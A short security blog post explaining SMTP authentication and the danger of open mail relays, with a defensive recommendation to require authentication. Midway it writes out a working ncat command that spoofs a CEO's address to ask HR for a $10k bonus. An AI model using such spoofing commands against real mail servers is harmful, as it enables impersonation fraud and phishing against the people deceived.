Inbox (1): Proper Email Authentication

By ivision November 19, 2021

Emails are sent from a source server to a destination server (sometimes through multiple hops) via the SMTP protocol. When you use a webmail client – think Gmail and Yahoo – to send an email, the web server sends emails to its bundled SMTP server and handles authentication for you. When you send an email through a desktop client, like Outlook, Thunderbird, or some mobile clients, the client connects directly to the configured SMTP server, authenticates and sends the email.

However, email is an old and arcane system designed for a less hostile world. SMTP servers are often configured to allow unauthenticated connections to send emails, allowing an attacker to spoof email addresses for phishing or spamming. In some intranet configurations, these emails could appear to be authentic with no telling signs of being sent by the legitimate account owner.

If there is an open SMTP relay on your company network, here is a quick way to make some money (and then go to jail).

ncat -t -C smtp.example.com 25 <<EOF

helo example.com

mail from:<mr.ceo@example.com>

rcpt to:<hrdepartment@example.com>

data

From: “Mr. CEO” mr.ceo@example.com

To: “HR” hrdepartment@example.com

Date: Wed, 01 Apr 2021 12:01:01 -0500

Subject: Give John Smith a bonus

He deserves a $10k bonus.

Regards,

Mr. CEO

.

quit

EOF

The preceding command would cause an email to be sent to the HR department pretending to be the CEO asking to give John Smith a bonus. The command would work because ‘ncat’ is a modern netcat utility, ‘-t’ adds on flags for telnet compatibility and ‘-C’ converts the line ending to CRLF (which some SMTP servers require).

The best way to close an SMTP relay and prevent everyone from getting 10k is to require authentication and ensure that permissions do not allow authenticated users to send emails from other people without proper authorization.